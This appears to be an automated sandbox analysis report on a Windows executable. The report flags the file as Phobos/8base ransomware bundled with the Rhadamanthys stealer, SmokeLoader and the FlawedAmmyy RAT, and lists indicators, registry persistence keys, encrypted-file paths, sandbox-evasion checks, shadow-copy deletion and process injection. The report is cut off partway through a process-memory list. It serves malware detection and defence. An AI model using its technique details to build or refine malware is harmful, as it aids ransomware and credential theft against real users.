Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
16-09-2023 03:39
Static task
static1
Behavioral task
behavioral1
Sample
e6f506f57365deb1b24b84eafbd9271f.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
e6f506f57365deb1b24b84eafbd9271f.exe
Resource
win10v2004-20230915-en
General
-
Target
e6f506f57365deb1b24b84eafbd9271f.exe
-
Size
468KB
-
MD5
e6f506f57365deb1b24b84eafbd9271f
-
SHA1
d120720527f6d02f2c6e058bc95cc18d8c23f269
-
SHA256
ab3985e07195465b9a9d8c5a9959e783e2a30f6d6e7fdda3ab153de4d7fc6fe6
-
SHA512
3273f5720d13ae0c77eb9e35ef52368f187b4acfe1e40471629c6e51e0f7c442f420bd0cbbe1f5e21918760fdd260cb86b7086eb93d92e28d00b502cd3e066e9
-
SSDEEP
12288:zPmdD7nWjmGR5iErreKOOkLsxhDzfrroATRwJJ:7mN7u5iEKOKalroATRwX
Malware Config
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\B38C.tmp\svchost.exe family_ammyyadmin C:\Users\Admin\AppData\Local\Temp\B38C.tmp\svchost.exe family_ammyyadmin -
Detect rhadamanthys stealer shellcode 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3792-14-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys behavioral2/memory/3792-16-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys behavioral2/memory/3792-15-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys behavioral2/memory/3792-17-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys behavioral2/memory/3792-27-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys behavioral2/memory/3792-29-0x0000000002C50000-0x0000000003050000-memory.dmp family_rhadamanthys -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
e6f506f57365deb1b24b84eafbd9271f.exedescription pid process target process PID 3792 created 3136 3792 e6f506f57365deb1b24b84eafbd9271f.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 1476 bcdedit.exe 292 bcdedit.exe 1072 bcdedit.exe 3860 bcdedit.exe -
Renames multiple (146) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Processes:
wbadmin.exewbadmin.exepid process 4868 wbadmin.exe 4372 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 4516 netsh.exe 1464 netsh.exe 2356 netsh.exe 4676 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation svchost.exe -
Drops startup file 2 IoCs
Processes:
lALl4~s[aX.exe750C.exedescription ioc process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\lALl4~s[aX.exe lALl4~s[aX.exe File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\750C.exe 750C.exe -
Executes dropped EXE 15 IoCs
Processes:
lALl4~s[aX.exelALl4~s[aX.exelALl4~s[aX.exelALl4~s[aX.exelALl4~s[aX.exebtMC.exerA2PmA.exebtMC.exebtMC.exe750C.exe750C.exe7710.exe750C.exe750C.exesvchost.exepid process 432 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 1184 lALl4~s[aX.exe 1628 lALl4~s[aX.exe 2580 lALl4~s[aX.exe 1556 btMC.exe 1100 rA2PmA.exe 4808 btMC.exe 3496 btMC.exe 4632 750C.exe 4596 750C.exe 4720 7710.exe 3904 750C.exe 472 750C.exe 4392 svchost.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4756 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
Processes:
certreq.exeexplorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
750C.exelALl4~s[aX.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\750C = "C:\\Users\\Admin\\AppData\\Local\\750C.exe" 750C.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lALl4~s[aX = "C:\\Users\\Admin\\AppData\\Local\\lALl4~s[aX.exe" lALl4~s[aX.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lALl4~s[aX = "C:\\Users\\Admin\\AppData\\Local\\lALl4~s[aX.exe" lALl4~s[aX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\750C = "C:\\Users\\Admin\\AppData\\Local\\750C.exe" 750C.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
lALl4~s[aX.exedescription ioc process File opened for modification C:\$Recycle.Bin\S-1-5-21-2890696111-2332180956-3312704074-1000\desktop.ini lALl4~s[aX.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2890696111-2332180956-3312704074-1000\desktop.ini lALl4~s[aX.exe File opened for modification C:\Program Files\desktop.ini lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI lALl4~s[aX.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
svchost.exedescription ioc process File opened for modification \??\PhysicalDrive0 svchost.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
e6f506f57365deb1b24b84eafbd9271f.exelALl4~s[aX.exelALl4~s[aX.exebtMC.exerA2PmA.exeaspnet_compiler.exe750C.exe750C.exedescription pid process target process PID 2744 set thread context of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 432 set thread context of 3008 432 lALl4~s[aX.exe lALl4~s[aX.exe PID 1184 set thread context of 2580 1184 lALl4~s[aX.exe lALl4~s[aX.exe PID 1556 set thread context of 3496 1556 btMC.exe btMC.exe PID 1100 set thread context of 4256 1100 rA2PmA.exe aspnet_compiler.exe PID 4256 set thread context of 972 4256 aspnet_compiler.exe AddInProcess.exe PID 4632 set thread context of 4596 4632 750C.exe 750C.exe PID 3904 set thread context of 472 3904 750C.exe 750C.exe -
Drops file in Program Files directory 64 IoCs
Processes:
lALl4~s[aX.exe750C.exedescription ioc process File created C:\Program Files\7-Zip\Lang\ko.txt.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages.properties.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar lALl4~s[aX.exe File created C:\Program Files\Java\jre1.8.0_66\bin\j2pcsc.dll.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.png.id[521E79F2-3483].[[email protected]].8base 750C.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-180.png.id[521E79F2-3483].[[email protected]].8base 750C.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\DBGCORE.DLL 750C.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-runtime-l1-1-0.dll.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-oob.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.dll.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\7-Zip\Lang\he.txt.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_KMS_Client-ppd.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar lALl4~s[aX.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui 750C.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jsdt.dll lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png.id[521E79F2-3483].[[email protected]].8base 750C.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_wer.dll lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\localedata.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Trial-pl.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\Custom.propdesc.id[521E79F2-3483].[[email protected]].8base 750C.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ul-phn.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ppd.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Common Files\System\ado\msadox28.tlb lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms lALl4~s[aX.exe File opened for modification C:\Program Files\Common Files\System\msadc\msdfmap.dll 750C.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE.HXS.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.id[521E79F2-3483].[[email protected]].8base 750C.exe File created C:\Program Files\Microsoft Office\root\Office16\MEDIA\WHOOSH.WAV.id[521E79F2-3483].[[email protected]].8base 750C.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Common Files\System\msadc\it-IT\msadcer.dll.mui 750C.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar lALl4~s[aX.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Reflection.eftx.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ul-phn.xrm-ms lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dll lALl4~s[aX.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\cldrdata.jar.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File created C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ul-oob.xrm-ms.id[521E79F2-3483].[[email protected]].8base lALl4~s[aX.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe 750C.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt lALl4~s[aX.exe -
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exebtMC.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI btMC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI btMC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI btMC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
certreq.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 certreq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString certreq.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 2832 vssadmin.exe 2456 vssadmin.exe -
Modifies registry class 2 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e6f506f57365deb1b24b84eafbd9271f.execertreq.exelALl4~s[aX.exebtMC.exebtMC.exelALl4~s[aX.exerA2PmA.exeExplorer.EXEpid process 3792 e6f506f57365deb1b24b84eafbd9271f.exe 3792 e6f506f57365deb1b24b84eafbd9271f.exe 3792 e6f506f57365deb1b24b84eafbd9271f.exe 3792 e6f506f57365deb1b24b84eafbd9271f.exe 4928 certreq.exe 4928 certreq.exe 4928 certreq.exe 4928 certreq.exe 1184 lALl4~s[aX.exe 1184 lALl4~s[aX.exe 1556 btMC.exe 1556 btMC.exe 3496 btMC.exe 3496 btMC.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 1100 rA2PmA.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3008 lALl4~s[aX.exe 3008 lALl4~s[aX.exe 3136 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious behavior: MapViewOfSection 33 IoCs
Processes:
btMC.exeExplorer.EXEexplorer.exepid process 3496 btMC.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 4516 explorer.exe 4516 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
e6f506f57365deb1b24b84eafbd9271f.exelALl4~s[aX.exelALl4~s[aX.exebtMC.exelALl4~s[aX.exerA2PmA.exevssvc.exeWMIC.exeaspnet_compiler.exeExplorer.EXEwbengine.exeAddInProcess.exedescription pid process Token: SeDebugPrivilege 2744 e6f506f57365deb1b24b84eafbd9271f.exe Token: SeDebugPrivilege 432 lALl4~s[aX.exe Token: SeDebugPrivilege 1184 lALl4~s[aX.exe Token: SeDebugPrivilege 1556 btMC.exe Token: SeDebugPrivilege 3008 lALl4~s[aX.exe Token: SeDebugPrivilege 1100 rA2PmA.exe Token: SeBackupPrivilege 2416 vssvc.exe Token: SeRestorePrivilege 2416 vssvc.exe Token: SeAuditPrivilege 2416 vssvc.exe Token: SeIncreaseQuotaPrivilege 2500 WMIC.exe Token: SeSecurityPrivilege 2500 WMIC.exe Token: SeTakeOwnershipPrivilege 2500 WMIC.exe Token: SeLoadDriverPrivilege 2500 WMIC.exe Token: SeSystemProfilePrivilege 2500 WMIC.exe Token: SeSystemtimePrivilege 2500 WMIC.exe Token: SeProfSingleProcessPrivilege 2500 WMIC.exe Token: SeIncBasePriorityPrivilege 2500 WMIC.exe Token: SeCreatePagefilePrivilege 2500 WMIC.exe Token: SeBackupPrivilege 2500 WMIC.exe Token: SeRestorePrivilege 2500 WMIC.exe Token: SeShutdownPrivilege 2500 WMIC.exe Token: SeDebugPrivilege 2500 WMIC.exe Token: SeSystemEnvironmentPrivilege 2500 WMIC.exe Token: SeRemoteShutdownPrivilege 2500 WMIC.exe Token: SeUndockPrivilege 2500 WMIC.exe Token: SeManageVolumePrivilege 2500 WMIC.exe Token: 33 2500 WMIC.exe Token: 34 2500 WMIC.exe Token: 35 2500 WMIC.exe Token: 36 2500 WMIC.exe Token: SeIncreaseQuotaPrivilege 2500 WMIC.exe Token: SeSecurityPrivilege 2500 WMIC.exe Token: SeTakeOwnershipPrivilege 2500 WMIC.exe Token: SeLoadDriverPrivilege 2500 WMIC.exe Token: SeSystemProfilePrivilege 2500 WMIC.exe Token: SeSystemtimePrivilege 2500 WMIC.exe Token: SeProfSingleProcessPrivilege 2500 WMIC.exe Token: SeIncBasePriorityPrivilege 2500 WMIC.exe Token: SeCreatePagefilePrivilege 2500 WMIC.exe Token: SeBackupPrivilege 2500 WMIC.exe Token: SeRestorePrivilege 2500 WMIC.exe Token: SeShutdownPrivilege 2500 WMIC.exe Token: SeDebugPrivilege 2500 WMIC.exe Token: SeSystemEnvironmentPrivilege 2500 WMIC.exe Token: SeRemoteShutdownPrivilege 2500 WMIC.exe Token: SeUndockPrivilege 2500 WMIC.exe Token: SeManageVolumePrivilege 2500 WMIC.exe Token: 33 2500 WMIC.exe Token: 34 2500 WMIC.exe Token: 35 2500 WMIC.exe Token: 36 2500 WMIC.exe Token: SeDebugPrivilege 4256 aspnet_compiler.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeBackupPrivilege 3172 wbengine.exe Token: SeRestorePrivilege 3172 wbengine.exe Token: SeSecurityPrivilege 3172 wbengine.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeLockMemoryPrivilege 972 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
AddInProcess.exesvchost.exepid process 972 AddInProcess.exe 4392 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e6f506f57365deb1b24b84eafbd9271f.exee6f506f57365deb1b24b84eafbd9271f.exelALl4~s[aX.exelALl4~s[aX.exebtMC.exelALl4~s[aX.execmd.execmd.exerA2PmA.exedescription pid process target process PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 2744 wrote to memory of 3792 2744 e6f506f57365deb1b24b84eafbd9271f.exe e6f506f57365deb1b24b84eafbd9271f.exe PID 3792 wrote to memory of 4928 3792 e6f506f57365deb1b24b84eafbd9271f.exe certreq.exe PID 3792 wrote to memory of 4928 3792 e6f506f57365deb1b24b84eafbd9271f.exe certreq.exe PID 3792 wrote to memory of 4928 3792 e6f506f57365deb1b24b84eafbd9271f.exe certreq.exe PID 3792 wrote to memory of 4928 3792 e6f506f57365deb1b24b84eafbd9271f.exe certreq.exe PID 432 wrote to memory of 3008 432 lALl4~s[aX.exe lALl4~s[aX.exe PID 432 wrote to memory of 3008 432 lALl4~s[aX.exe lALl4~s[aX.exe PID 432 wrote to memory of 3008 432 lALl4~s[aX.exe lALl4~s[aX.exe PID 432 wrote to memory of 3008 432 lALl4~s[aX.exe 